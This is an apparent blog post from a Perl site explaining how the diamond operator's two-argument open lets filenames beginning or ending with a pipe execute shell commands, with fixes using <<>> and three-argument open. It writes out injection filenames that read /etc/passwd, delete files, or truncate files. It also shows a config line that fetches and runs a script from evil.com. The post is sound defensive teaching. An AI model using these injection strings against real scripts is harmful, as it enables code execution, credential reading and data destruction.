perl.gg / hidden-gems

<!-- category: hidden-gems -->

The Diamond Operator Is a Shell Injection Vector

2026-04-25

The most common Perl input idiom is secretly a security hole.
while (<>) { chomp; process($_); }
That's the diamond operator. Reads from files listed in @ARGV, or STDIN if there are none. Every Perl tutorial teaches it. Every sysadmin uses it. And if a user can control the filenames, they can execute arbitrary shell commands through it.

No eval. No system. No backticks. Just <>.

Part 1: HOW <> PROCESSES @ARGV

When you write <>, Perl iterates through @ARGV and opens each element as a filename. If @ARGV is empty, it reads STDIN. Simple enough.
$ echo "hello" > greeting.txt $ perl -e 'print while <>' greeting.txt hello
But the way Perl opens those filenames is the problem. It uses the two-argument form of open internally. Not the safe three-argument form. The two-argument form.
# What <> does internally (simplified): for my $file (@ARGV) { open my $fh, $file; # TWO-argument open! while (<$fh>) { # process } close $fh; }
Two-argument open is a whole different beast from three-argument open. It interprets special characters in the filename.

Part 2: THE TWO-ARGUMENT OPEN LURKING INSIDE

Two-argument open treats certain characters as I/O instructions, not as part of the filename:
open my $fh, "file.txt"; # reads file.txt open my $fh, "<file.txt"; # reads file.txt (explicit input) open my $fh, ">file.txt"; # WRITES to file.txt (truncates!) open my $fh, ">>file.txt"; # APPENDS to file.txt open my $fh, "| command"; # pipes TO a command open my $fh, "command |"; # pipes FROM a command
Those last two are the dangerous ones. A leading or trailing pipe character turns a "filename" into a shell command.

And <> passes every element of @ARGV through two-argument open.

Part 3: FILENAMES STARTING WITH PIPE EXECUTE COMMANDS

If someone passes a filename that starts with |, Perl interprets it as "pipe output to this command":
# malicious_script.pl while (<>) { chomp; say "Processing: $_"; }
$ perl malicious_script.pl "| echo PWNED > /tmp/proof"
That doesn't try to open a file called | echo PWNED > /tmp/proof. It runs echo PWNED > /tmp/proof as a shell command. Check /tmp/proof and you'll find the word PWNED sitting there.

The <> operator happily executed a shell command because the "filename" started with a pipe. Your script didn't intend to run commands. It just wanted to read files. But two-argument open doesn't care about your intentions.

Part 4: FILENAMES ENDING WITH PIPE EXECUTE TOO

A trailing pipe is even nastier. It means "run this command and read its output":
$ perl -e 'print while <>' "cat /etc/passwd |"
That runs cat /etc/passwd and feeds the output through <> as if it were file contents. Your script reads what looks like file data, but it's actually command output.

More dangerous:

$ perl -e 'print while <>' "rm -rf /tmp/important_stuff |"
That runs the rm command. The output of rm (nothing, usually) gets read by your script. But the damage is done. The files are gone.

Your Perl script just became a remote code execution vector.

Part 5: A PRACTICAL DEMONSTRATION

Let's see this clearly. Here's a script that "safely" processes log files:
#!/usr/bin/env perl use strict; use warnings; use feature 'say'; # "Safely" count lines in each file my $total = 0; while (<>) { $total++; } say "Total lines: $total";
Normal usage:
$ perl linecount.pl access.log error.log Total lines: 4521
Malicious usage:
$ perl linecount.pl "ls /etc |" Total lines: 47
The script happily counted the output lines of ls /etc instead of reading a file. The user ran an arbitrary command through your script.

Now imagine this script runs as a cron job that processes filenames from a database. Or a web application that takes filenames from user input. Or a sysadmin tool that processes files from a config file that someone else can edit.

Part 6: THE <<>> DOUBLE DIAMOND FIX

Perl 5.22 introduced the double diamond operator <<>>. It does everything <> does, but uses three-argument open internally. Special characters in filenames are treated as literal characters, not as I/O instructions.
#!/usr/bin/env perl use strict; use warnings; use feature 'say'; # SAFE version while (<<>>) { chomp; say "Line: $_"; }
$ perl safe_script.pl "| echo PWNED" Can't open | echo PWNED: No such file or directory
The double diamond tried to open a file literally named | echo PWNED. No command execution. No shell involvement. Just a clean error message.

If you're on Perl 5.22 or later (you should be), use <<>> instead of <>. Always. There is no reason to use single diamond when processing filenames from @ARGV.

Part 7: DEFENDING EXISTING CODE

What if you can't upgrade to <<>> or you're maintaining legacy code? Several defenses:

Defense 1: Validate @ARGV before using <>

for my $file (@ARGV) { if ($file =~ m~[|<>]~ || !-f $file) { die "Invalid filename: $file\n"; } } while (<>) { # now safe }
Defense 2: Use three-argument open explicitly
for my $file (@ARGV) { open my $fh, '<', $file or do { warn "Cannot open $file: $!\n"; next; }; while (<$fh>) { chomp; process($_); } close $fh; }
Three-argument open with the explicit < mode is always safe. The filename is treated as a literal string. No pipe interpretation. No special characters. This is the gold standard.

Defense 3: Use ARGV::readonly from CPAN

use ARGV::readonly; while (<>) { # @ARGV entries are sanitized }
The module hooks into the <> mechanism and prevents command execution. Drop-in fix for existing code.

Part 8: WHY THIS MATTERS FOR SYSADMIN SCRIPTS

Sysadmin scripts are the highest-risk category. They often:

A script written in 2005 that uses <> to process log files might still be running in production today. If an attacker can influence the filenames it processes, through a config file, a database, a web form, a symlink attack, they have code execution.

# Typical sysadmin pattern (VULNERABLE) #!/usr/bin/env perl use strict; use warnings; # Process whatever files the config tells us to my @files = read_config("/etc/myapp/files.conf"); @ARGV = @files; while (<>) { # process log entries }
If someone can write to files.conf, they own your server. One line like | curl http://evil.com/backdoor.sh | bash in that config file and game over.

Fix:

# SAFE version for my $file (@files) { open my $fh, '<', $file or do { warn "Skipping $file: $!\n"; next; }; while (<$fh>) { # process log entries } close $fh; }

Part 9: OTHER SNEAKY FILENAMES

Pipes aren't the only danger. Two-argument open also interprets:
FILENAME WHAT HAPPENS ">/etc/passwd" Truncates /etc/passwd (if permissions allow) ">>/tmp/log" Appends to /tmp/log "+<file" Opens file for read/write "-" Reads from STDIN (can cause hangs) "" Empty string, reads STDIN on some systems
A filename of >important.dat passed through <> will truncate that file. Not read it. Truncate it. Data gone.

Even the humble - is dangerous in automated contexts. If your cron job passes - as a filename, the script hangs forever waiting for STDIN input that will never come.

The double diamond <<>> handles all of these correctly. Every filename is literal. No interpretation. No surprises.

Part 10: THE RULE

The rule is simple:
+------------------------------------------+ | | | <> is for quick one-liners where YOU | | control the arguments. | | | | <<>> is for scripts where ANYONE | | might control the arguments. | | | | Three-argument open is for when you | | want to be absolutely sure. | | | +------------------------------------------+ .--. |o_o | "Two-argument open trusts |:_/ | the filename. The filename // \ \ doesn't deserve that trust." (| | ) /'\_ _/`\ \___)=(___/
The diamond operator is convenient. It's elegant. It's the Perl way to process files from the command line. And it has a shell injection vulnerability baked into its implementation.

Know the risk. Use <<>> or three-argument open. Validate your inputs. Every sysadmin script that processes filenames from untrusted sources should be audited for this. Today. Not tomorrow.

If you grep your codebase for while (<>) and find matches in scripts that process external filenames, you have homework to do.

perl.gg